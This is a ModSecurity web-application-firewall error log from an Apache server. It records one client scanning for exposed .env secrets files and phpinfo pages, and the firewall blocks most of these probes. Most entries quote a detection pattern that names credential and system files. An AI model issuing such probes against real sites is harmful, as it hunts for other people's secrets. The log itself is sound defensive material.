[Tue May 26 13:04:22.733878 2026] [security2:error] [pid 485064:tid 485213] [client 195.178.110.199:45614] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/media/.env"] [unique_id "ahVM_j9tlF55stOmSqH7OgAAAJg"]
[Tue May 26 13:04:22.734807 2026] [security2:error] [pid 485064:tid 485295] [client 195.178.110.199:45716] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/node/api/.env"] [unique_id "ahVM_j9tlF55stOmSqH7OwAAAOo"]
[Tue May 26 13:04:22.789919 2026] [security2:error] [pid 485064:tid 485308] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_j9tlF55stOmSqH7PgAAAPc"]
[Tue May 26 13:04:22.845171 2026] [security2:error] [pid 485064:tid 485206] [client 195.178.110.199:45664] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/nodeapi/.env"] [unique_id "ahVM_j9tlF55stOmSqH7RwAAAJE"]
[Tue May 26 13:04:22.880239 2026] [security2:error] [pid 485064:tid 485287] [client 195.178.110.199:45692] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/new/.env"] [unique_id "ahVM_j9tlF55stOmSqH7UgAAAOI"]
[Tue May 26 13:04:22.902067 2026] [security2:error] [pid 485064:tid 485267] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_j9tlF55stOmSqH7TgAAAM4"]
[Tue May 26 13:04:22.903826 2026] [security2:error] [pid 485064:tid 485200] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_j9tlF55stOmSqH7TwAAAIs"]
[Tue May 26 13:04:22.941299 2026] [security2:error] [pid 485064:tid 485194] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_j9tlF55stOmSqH7WAAAAIU"]
[Tue May 26 13:04:22.949075 2026] [security2:error] [pid 485064:tid 485273] [client 195.178.110.199:45670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/opt/.env"] [unique_id "ahVM_j9tlF55stOmSqH7XgAAANQ"]
[Tue May 26 13:04:22.958794 2026] [security2:error] [pid 485064:tid 485272] [client 195.178.110.199:45650] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/node/.env"] [unique_id "ahVM_j9tlF55stOmSqH7YQAAANM"]
[Tue May 26 13:04:22.975077 2026] [security2:error] [pid 485064:tid 485246] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_j9tlF55stOmSqH7WwAAALk"]
[Tue May 26 13:04:22.977192 2026] [security2:error] [pid 485064:tid 485198] [client 195.178.110.199:45614] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/node/backend/.env"] [unique_id "ahVM_j9tlF55stOmSqH7YgAAAIk"]
[Tue May 26 13:04:23.036823 2026] [security2:error] [pid 485064:tid 485318] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH7ZwAAAQE"]
[Tue May 26 13:04:23.078188 2026] [security2:error] [pid 485064:tid 485204] [client 195.178.110.199:45688] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/nodeweb/.env"] [unique_id "ahVM_z9tlF55stOmSqH7bwAAAI8"]
[Tue May 26 13:04:23.090856 2026] [security2:error] [pid 485064:tid 485298] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH7bQAAAO0"]
[Tue May 26 13:04:23.150460 2026] [security2:error] [pid 485064:tid 485254] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH7dQAAAME"]
[Tue May 26 13:04:23.158269 2026] [security2:error] [pid 485064:tid 485304] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH7eAAAAPM"]
[Tue May 26 13:04:23.161073 2026] [security2:error] [pid 485064:tid 485282] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH7ewAAAN0"]
[Tue May 26 13:04:23.222322 2026] [security2:error] [pid 485064:tid 485295] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH7ggAAAOo"]
[Tue May 26 13:04:23.223367 2026] [security2:error] [pid 485064:tid 485203] [client 195.178.110.199:45688] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/old/.env"] [unique_id "ahVM_z9tlF55stOmSqH7hQAAAI4"]
[Tue May 26 13:04:23.276891 2026] [security2:error] [pid 485064:tid 485284] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH7iAAAAN8"]
[Tue May 26 13:04:23.314847 2026] [security2:error] [pid 485064:tid 485269] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH7jQAAANA"]
[Tue May 26 13:04:23.333576 2026] [security2:error] [pid 485064:tid 485196] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH7kAAAAIc"]
[Tue May 26 13:04:23.339814 2026] [security2:error] [pid 485064:tid 485232] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH7lAAAAKs"]
[Tue May 26 13:04:23.345074 2026] [security2:error] [pid 485064:tid 485276] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH7lgAAANc"]
[Tue May 26 13:04:23.367419 2026] [security2:error] [pid 485064:tid 485245] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH7mwAAALg"]
[Tue May 26 13:04:23.367645 2026] [security2:error] [pid 485064:tid 485236] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH7nAAAAK8"]
[Tue May 26 13:04:23.383881 2026] [security2:error] [pid 485064:tid 485205] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH7oAAAAJA"]
[Tue May 26 13:04:23.397291 2026] [security2:error] [pid 485064:tid 485194] [client 195.178.110.199:45688] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH7pgAAAIU"]
[Tue May 26 13:04:23.398239 2026] [security2:error] [pid 485064:tid 485252] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH7pAAAAL8"]
[Tue May 26 13:04:23.426039 2026] [security2:error] [pid 485064:tid 485318] [client 195.178.110.199:45684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/php-info.php"] [unique_id "ahVM_z9tlF55stOmSqH7rQAAAQE"]
[Tue May 26 13:04:23.442614 2026] [security2:error] [pid 485064:tid 485198] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH7qwAAAIk"]
[Tue May 26 13:04:23.475400 2026] [security2:error] [pid 485064:tid 485204] [client 195.178.110.199:42362] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/php.php"] [unique_id "ahVM_z9tlF55stOmSqH7rgAAAI8"]
[Tue May 26 13:04:23.490149 2026] [security2:error] [pid 485064:tid 485298] [client 195.178.110.199:45716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/php_info.php"] [unique_id "ahVM_z9tlF55stOmSqH7rwAAAO0"]
[Tue May 26 13:04:23.516112 2026] [security2:error] [pid 485064:tid 485231] [client 195.178.110.199:45734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/phpinfo.php"] [unique_id "ahVM_z9tlF55stOmSqH7sQAAAKo"]
[Tue May 26 13:04:23.570969 2026] [security2:error] [pid 485064:tid 485309] [client 195.178.110.199:45688] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH7tgAAAPg"]
[Tue May 26 13:04:23.617809 2026] [security2:error] [pid 485064:tid 485221] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH7ugAAAKA"]
[Tue May 26 13:04:23.634903 2026] [security2:error] [pid 485064:tid 485285] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH7xQAAAOA"]
[Tue May 26 13:04:23.724537 2026] [security2:error] [pid 485064:tid 485224] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH7zwAAAKM"]
[Tue May 26 13:04:23.736250 2026] [security2:error] [pid 485064:tid 485220] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH7zgAAAJ8"]
[Tue May 26 13:04:23.784550 2026] [security2:error] [pid 485064:tid 485276] [client 195.178.110.199:45692] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/prod/.env"] [unique_id "ahVM_z9tlF55stOmSqH71gAAANc"]
[Tue May 26 13:04:23.837640 2026] [security2:error] [pid 485064:tid 485292] [client 195.178.110.199:45706] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/product/.env"] [unique_id "ahVM_z9tlF55stOmSqH78AAAAOc"]
[Tue May 26 13:04:23.853533 2026] [security2:error] [pid 485064:tid 485245] [client 195.178.110.199:45750] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH73QAAALg"]
[Tue May 26 13:04:23.875588 2026] [security2:error] [pid 485064:tid 485229] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH79AAAAKg"]
[Tue May 26 13:04:23.876586 2026] [security2:error] [pid 485064:tid 485205] [client 195.178.110.199:45664] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/production/.env"] [unique_id "ahVM_z9tlF55stOmSqH8BgAAAJA"]
[Tue May 26 13:04:23.916904 2026] [security2:error] [pid 485064:tid 485291] [client 195.178.110.199:42348] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/portal/.env"] [unique_id "ahVM_z9tlF55stOmSqH8DQAAAOY"]
[Tue May 26 13:04:23.925106 2026] [security2:error] [pid 485064:tid 485194] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_z9tlF55stOmSqH8CwAAAIU"]
[Tue May 26 13:04:23.936525 2026] [security2:error] [pid 485064:tid 485249] [client 195.178.110.199:45692] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/project/.env"] [unique_id "ahVM_z9tlF55stOmSqH8EAAAALw"]
[Tue May 26 13:04:23.984900 2026] [security2:error] [pid 485064:tid 485259] [client 195.178.110.199:45706] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/public/phpinfo.php"] [unique_id "ahVM_z9tlF55stOmSqH8EQAAAMY"]
[Tue May 26 13:04:24.028508 2026] [security2:error] [pid 485064:tid 485298] [client 195.178.110.199:42442] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/public_html/.env"] [unique_id "ahVNAD9tlF55stOmSqH8GAAAAO0"]
[Tue May 26 13:04:24.044021 2026] [security2:error] [pid 485064:tid 485253] [client 195.178.110.199:45614] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8FQAAAMA"]
[Tue May 26 13:04:24.066308 2026] [security2:error] [pid 485064:tid 485320] [client 195.178.110.199:45688] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/qa/.env"] [unique_id "ahVNAD9tlF55stOmSqH8KQAAAQM"]
[Tue May 26 13:04:24.151926 2026] [security2:error] [pid 485064:tid 485307] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8QAAAAPY"]
[Tue May 26 13:04:24.225004 2026] [security2:error] [pid 485064:tid 485311] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8RgAAAPo"]
[Tue May 26 13:04:24.228890 2026] [security2:error] [pid 485064:tid 485319] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8SwAAAQI"]
[Tue May 26 13:04:24.245534 2026] [security2:error] [pid 485064:tid 485314] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8UQAAAP0"]
[Tue May 26 13:04:24.257589 2026] [security2:error] [pid 485064:tid 485235] [client 195.178.110.199:42442] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/public-api/.env"] [unique_id "ahVNAD9tlF55stOmSqH8VgAAAK4"]
[Tue May 26 13:04:24.288125 2026] [security2:error] [pid 485064:tid 485220] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8VwAAAJ8"]
